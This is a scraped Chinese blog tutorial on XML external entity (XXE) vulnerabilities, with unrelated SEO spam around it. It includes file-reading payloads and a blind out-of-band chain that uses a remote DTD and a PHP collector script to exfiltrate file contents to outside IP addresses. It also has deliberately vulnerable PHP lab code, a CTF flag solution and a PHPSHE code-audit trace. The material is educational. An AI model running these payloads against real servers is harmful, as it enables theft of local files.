当前位置: 首页 > news >正文

网站备案号在哪wordpress4.6 手册

网站备案号在哪,wordpress4.6 手册,东莞网站关键词优化,wordpress调用分类目录插件在网络安全领域#xff0c;XML外部实体#xff08;XXE#xff09;漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用#xff0c;XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件#xff0c;可能成为攻击者入侵系统的利器。因此#xff0c…在网络安全领域XML外部实体XXE漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件可能成为攻击者入侵系统的利器。因此理解XXE漏洞的原理并掌握其复现与代码审计技巧对于提升系统安全性至关重要。 本文将深入剖析XXE漏洞的工作原理展示如何在实际环境中复现该漏洞并提供详尽的代码审计方法。无论您是网络安全初学者还是资深开发者都能从中获得实用的知识和技能。让我们一起解密XXE漏洞提升我们的安全防护能力。 基本原理 XML 文档可以包含实体 (Entity)实体可以是内部的定义在文档内部或外部的引用外部资源。外部实体通常用于在 XML 文档中包含外部数据。如果 XML 解析器允许解析外部实体那么攻击者可以利用这一点来执行恶意操作。 XXE发现 黑盒 获取得到Content-Type或数据类型为xml时尝试进行xml语言payload进行测试不管获取的Content—Type类型或数据传输类型均可尝试修改后提交测试xxeXXE不仅在数据传输上可能存在漏洞同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行 白盒 可通过应用功能追踪代码定位审计可通过脚本特定函数搜索定位审计可通过伪协议玩法绕过相关修复等 XXE~payload 读取文件 ?xml version1.0?!DOCTYPE Mikasa [!ENTITY test SYSTEM file:///d:/e.txt]userusernametest;/usernamepasswordMikasa/password/user带外测试 ?xml version1.0?!DOCTYPE test [!ENTITY % file SYSTEM http://7drrcs.dnslog.cn%file;]userusernamesend;/usernamepasswordMikasa/password/user引用外部实体dtd ?xml version1.0 ?!DOCTYPE test [!ENTITY % file SYSTEM http://127.0.0.1/evil2.dtd%file;]userusernamesend;/usernamepasswordMikasa/password/user-----------------------------------------------------------------------------evil2.dtd!ENTITY send SYSTEM file:///d:/1/1.txt无回显读文件-带外 ?xml version1.0?!DOCTYPE ANY [!ENTITY % file SYSTEM file:///d:/e.txt!ENTITY % remote SYSTEM http://47.94.236.117/test.dtd%remote;%all;]rootsend;/root-------------------------------------------------------------------------------服务端test.dtd!ENTITY % all !ENTITY send SYSTEM http://47.94.236.117/get.php?file%file;get.php?php$data $_GET[file];$myfile fopen(file.txt, w);fwrite($myfile, $data);fclose($myfile);?复现 **复现文件**​php_xxe.zip 读取文件 源码 doLogin.php?php$USERNAME admin; //账号$PASSWORD admin; //密码$result null;libxml_disable_entity_loader(false);$xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);}}catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage());}header(Content-Type: text/html; charsetutf-8);echo $result;?捉取登录框的数据包替换数据包内容即可 带外测试 源码 ?php $USERNAME admin; //账号 $PASSWORD admin; //密码 $result null;libxml_disable_entity_loader(false); $xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){//$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{//$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);} }catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage()); }header(Content-Type: text/html; charsetutf-8); echo $result; ?捉取数据包替换其内容即可 外部实体引用 源码同上 本地有一个dtd文件evil2.dtd内容为 !ENTITY send SYSTEM file:///d:/1/1.txt 捉包改包来引用他 无回显带外 源码 ?php $USERNAME admin; //账号 $PASSWORD admin; //密码 $result null;libxml_disable_entity_loader(false); $xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){//$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{//$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);} }catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage()); }header(Content-Type: text/html; charsetutf-8); echo $result; ?在服务端部署evil2.dtd和get.php ?xml version1.0?!DOCTYPE ANY[!ENTITY % file SYSTEM file:///d:/1/1.txt!ENTITY % remote SYSTEM http://43.139.186.80/evil2.dtd%remote;%all;]rootsend;/root---------------------------------------------服务端evil2.dtd!ENTITY % all !ENTITY send SYSTEM http://43.139.186.80/get.php?file%file;get.php?php$data $_GET[file];$myfile fopen(file.txt, w);fwrite($myfile, $data);fclose($myfile);?捉包替换数据包内容将1.txt的内容带到服务端 CTF赛题 前端代码 靶场地址http://web.jarvisoj.com:9882/htmlheadlink href//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/css/bootstrap-editable.css relstylesheet/script src//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/js/bootstrap-editable.min.js/script/headbodydiv classshowtextarea idtip-area width100px height50px disabled/textarea/divdiv classcontrol-areainput idevil-input typetext width100px height50px valuetype sth!/button classbtn btn-default typebutton onclicksend()Go!/button/divscriptfunction XHR() {var xhr;try {xhr new XMLHttpRequest();}catch(e) {var IEXHRVers [Msxml3.XMLHTTP,Msxml2.XMLHTTP,Microsoft.XMLHTTP];for (var i0,lenIEXHRVers.length;i len;i) {try {xhr new ActiveXObject(IEXHRVers[i]);}catch(e) {continue;}}}return xhr;}function send(){evil_input document.getElementById(evil-input).value;var xhr XHR();xhr.open(post,/api/v1.0/try,true);xhr.onreadystatechange function () {if (xhr.readyState4 xhr.status201) {data JSON.parse(xhr.responseText);tip_area document.getElementById(tip-area);tip_area.value data.task.searchdata.task.value;}};xhr.setRequestHeader(Content-Type,application/json);xhr.send({search:evil_input,value:own});}/script/body/html//可以看到XMLHttpRequest猜测存在xxe漏洞·捉取数据包并修改内容和类型 POST /api/v1.0/try HTTP/1.1 Host: web.jarvisoj.com:9882 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 Accept-Encoding: gzip, deflate Content-Type: application/xml;charsetutf-8 Referer: http://web.jarvisoj.com:9882/ Content-Length: 108 DNT: 1 Connection: close?xml version 1.0? !DOCTYPE ANY [!ENTITY f SYSTEM file:///home/ctf/flag.txt ] xf;/x代码审计流程 源码链接https://pan.baidu.com/s/15O6Hf2tM90T3ZEp9E2x_Ew?pwdcong 过程 首先放入审计系统 搜索可疑xxe函数simplexml_load_string 看到敏感可疑函数最终pe_getxml函数的调用 最终到wechat_getxml继续全局搜索最终 最后追踪到这个路径D:\phpstudy_pro\WWW\phpshe\include\plugin\payment\wechat\notify_url.php 在网站上访问并测试是否存在漏洞 发现xxe漏洞因为通过源码发现他的返回结果是固定的所以利用无回显文件外带即可任意读取 通过本次学习我们不仅深入了解了XXE漏洞的原理还掌握了复现该漏洞的具体步骤和代码审计的方法。安全防护不仅是技术问题更是一种意识和态度。通过对XXE漏洞的全面剖析我们能够更好地识别和修复潜在的安全风险从而保护我们的系统和数据安全。 在信息安全的道路上没有终点。希望本文能为您在安全防护方面提供有价值的指导和帮助激发您对网络安全的持续关注和兴趣。让我们共同努力构建一个更为安全的网络环境。如果您有任何疑问或宝贵的建议欢迎在评论区与我们互动。感谢您的阅读期待您的反馈与分享
http://www.hkea.cn/news/14263181/

相关文章:

  • 西湖区外贸网站建设小目标网站建设
  • 南宁月嫂网站建设郴州房产网
  • 什么是门户网站广告如何做好网站建设的关键重点
  • 做一个商城网站域名买完了网站建设
  • access 网站后台宝贝我想跟你做网站
  • 从零开始自己做外贸网站和海外网络营销wordpress明星
  • 自己怎么建个免费网站折一把古风扇子
  • 社交网站开发教程小程序建站工具
  • 群晖ds218 做网站用php做注册网站的代码
  • 网站建设太金手指六六三十WordPress资讯网站
  • 公司网站出现空白页长沙 建站优化
  • 汕头免费建站哪里有有没有网站可以学做床上用品
  • 瑞安做网站房子装修风格大全2021新款
  • 哪个网站做国内销海外的wordpress 3.9 中文
  • 购物网站建设比较好的徐州云龙区建设局网站
  • 图书馆网站开发总结网站开发课程心得
  • 茶叶有什么网站可以做推广wordpress局域网建站
  • 做外贸需要关注的网站有什么好处网站建设使用多语言
  • 展览展示设计网站喀什网站制作
  • 互助网站建设公司门户网站产品设计方案
  • 网站开发人员保密wordpress可视化找不着
  • 网站建设必学课程网站编辑制作
  • 哪里可以制作网站wordpress安装包下载
  • 怎么做网站维护宣传中企动力是干什么的
  • wordpress取第一张图片下载班级优化大师
  • 泰安网站建设哪家不错国际重大新闻事件2023
  • 网站页面建设规划文案我是做网站的
  • 宁波手机网站开发公司番禺网站开发哪家专业
  • 免费金融发布网站模板下载企业邮箱哪家便宜
  • 十大网站在线观看徐州市铜山新区建设局网站